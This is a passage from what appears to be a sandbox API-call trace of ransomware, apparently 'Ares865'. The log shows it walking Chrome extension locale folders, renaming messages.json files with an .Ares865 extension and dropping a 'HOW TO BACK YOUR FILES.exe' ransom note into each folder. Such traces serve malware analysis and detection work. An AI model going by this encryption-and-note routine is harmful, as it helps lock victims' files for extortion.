data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.699] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.702] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr" [0102.702] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr" [0102.702] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.702] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.703] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.703] GetLastError () returned 0x0 [0102.703] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.703] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebd9640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebd9640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.703] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.703] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.704] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.Ares865") returned 162 [0102.704] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.705] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.708] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi" [0102.709] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi" [0102.709] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.709] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.709] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.710] GetLastError () returned 0x0 [0102.710] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.710] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebd9640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebd9640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.710] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.710] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.710] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.Ares865") returned 162 [0102.710] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.711] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.715] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he" [0102.715] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he" [0102.716] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.716] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.716] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.716] GetLastError () returned 0x0 [0102.717] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebff7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebff7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.717] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.717] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.Ares865") returned 162 [0102.717] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.719] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.722] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr" [0102.722] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr" [0102.722] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.722] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.723] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.723] GetLastError () returned 0x0 [0102.723] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.723] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebff7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebff7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.723] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.723] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.723] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.Ares865") returned 162 [0102.723] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.725] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.728] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil" [0102.728] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil" [0102.729] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.729] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.729] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.729] GetLastError () returned 0x0 [0102.730] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.730] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebff7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebff7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.730] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.730] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.730] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.Ares865") returned 163 [0102.730] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 